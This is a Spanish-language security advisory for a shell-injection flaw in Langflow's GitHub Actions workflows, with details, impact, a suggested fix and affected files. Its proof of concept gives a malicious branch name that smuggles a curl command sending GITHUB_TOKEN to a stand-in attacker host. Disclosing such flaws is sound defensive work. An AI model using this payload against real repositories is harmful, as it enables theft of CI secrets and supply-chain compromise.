Vulnerabilidad en langflow de langflow-ai (CVE-2026-33475)

Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Una vulnerabilidad de inyección de shell remota no autenticada existe en múltiples flujos de trabajo de GitHub Actions en el repositorio de Langflow antes de la versión 1.9.0. La interpolación no saneada de variables de contexto de GitHub (por ejemplo, `${{ github.head_ref }}`) en los pasos `run:` permite a los atacantes inyectar y ejecutar comandos de shell arbitrarios a través de un nombre de rama o título de solicitud de extracción malicioso. Esto puede llevar a la exfiltración de secretos (por ejemplo, `GITHUB_TOKEN`), manipulación de infraestructura o compromiso de la cadena de suministro durante la ejecución de CI/CD. La versión 1.9.0 parchea la vulnerabilidad.<br /> <br /> ---<br /> <br /> ### Detalles<br /> <br /> Varios flujos de trabajo en `.github/workflows/` y `.github/actions/` referencian variables de contexto de GitHub directamente en comandos de shell `run:`, como:<br /> <br /> ```yaml<br /> run: |<br /> validate_branch_name "${{ github.event.pull_request.head.ref }}"<br /> ```<br /> <br /> O:<br /> <br /> ```yaml<br /> run: npx playwright install ${{ inputs.browsers }} --with-deps<br /> ```<br /> <br /> Dado que `github.head_ref`, `github.event.pull_request.title` y `inputs.*` personalizados pueden contener valores controlados por el usuario, deben tratarse como entrada no confiable. La interpolación directa sin el entrecomillado o saneamiento adecuados conduce a la inyección de comandos de shell.<br /> <br /> ---<br /> <br /> ### PoC<br /> <br /> 1. Bifurcar el repositorio de Langflow<br /> 2. Crear una nueva rama con el nombre:<br /> ```bash<br /> injection-test &amp;amp;&amp;amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN<br /> ```<br /> 3. Abrir una solicitud de extracción a la rama principal desde la nueva rama<br /> 4. GitHub Actions ejecutará el flujo de trabajo afectado (por ejemplo, `deploy-docs-draft.yml`)<br /> 5. El paso `run:` que contiene:<br /> ```yaml<br /> echo "Branch: ${{ github.head_ref }}"<br /> ```<br /> Ejecutará:<br /> ```bash<br /> echo "Branch: injection-test"<br /> curl https://attacker.site/exfil?token=$GITHUB_TOKEN<br /> ```<br /> <br /> 6. El atacante recibe el secreto de CI a través de la URL de exfiltración.<br /> <br /> ---<br /> <br /> ### Impacto<br /> <br /> - Tipo: Inyección de Shell / Ejecución Remota de Código en CI<br /> - Alcance: Cualquier bifurcación pública de Langflow con GitHub Actions habilitado<br /> - Impacto: Acceso total a secretos de CI (por ejemplo, `GITHUB_TOKEN`), posibilidad de subir etiquetas o imágenes maliciosas, manipular lanzamientos o filtrar datos de infraestructura sensibles<br /> <br /> ---<br /> <br /> ### Solución Sugerida<br /> <br /> Refactorizar los flujos de trabajo afectados para usar variables de entorno y envolverlas en comillas dobles:<br /> <br /> ```yaml<br /> env:<br /> BRANCH_NAME: ${{ github.head_ref }}<br /> run: |<br /> echo "Branch is: \"$BRANCH_NAME\""<br /> ```<br /> <br /> Evitar la interpolación directa `${{ ... }}` dentro de `run:` para cualquier valor controlado por el usuario.<br /> <br /> ---<br /> <br /> ### Archivos Afectados (Langflow `1.3.4`)<br /> <br /> - `.github/actions/install-playwright/action.yml`<br /> - `.github/workflows/deploy-docs-draft.yml`<br /> - `.github/workflows/docker-build.yml`<br /> - `.github/workflows/release_nightly.yml`<br /> - `.github/workflows/python_test.yml`<br /> - `.github/workflows/typescript_test.yml`